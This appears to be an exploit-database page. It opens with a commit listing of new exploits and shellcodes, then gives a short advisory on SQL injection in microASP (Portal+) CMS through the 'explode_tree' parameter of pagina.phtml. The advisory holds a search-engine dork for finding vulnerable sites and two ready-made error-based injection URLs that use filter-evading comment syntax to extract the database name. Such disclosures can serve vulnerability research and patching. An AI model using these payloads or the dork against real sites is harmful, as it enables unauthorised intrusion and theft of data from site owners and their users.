79a9df09f0
13 changes to exploits/shellcodes iOS 12.1.3 - 'cfprefsd' Memory Corruption Windows PowerShell ISE - Remote Code Execution NSClient++ 0.5.2.35 - Privilege Escalation Windows PowerShell ISE - Remote Code Execution LG Supersign EZ CMS - Remote Code Execution (Metasploit) Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter) ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution PHPads 2.0 - 'click.php3?bannerID' SQL Injection microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes) Linux/x86 - shred file Shellcode (72 bytes)
28 lines
No EOL
833 B
Text
28 lines
No EOL
833 B
Text
[+] Sql Injection on microASP (Portal+) CMS
|
|
|
|
[+] Date: 05/05/2019
|
|
|
|
[+] Risk: High
|
|
|
|
[+] CWE Number : CWE-89
|
|
|
|
[+] Author: Felipe Andrian Peixoto
|
|
|
|
[+] Vendor Homepage: http://www.microasp.it/
|
|
|
|
[+] Contact: felipe_andrian@hotmail.com
|
|
|
|
[+] Tested on: Windows 7 and Gnu/Linux
|
|
|
|
[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)
|
|
|
|
[+] Exploit :
|
|
|
|
http://host/patch/pagina.phtml?explode_tree= [SQL Injection]
|
|
|
|
[+] PoC :
|
|
|
|
https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
|
|
https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
|
|
|
|
[+] EOF |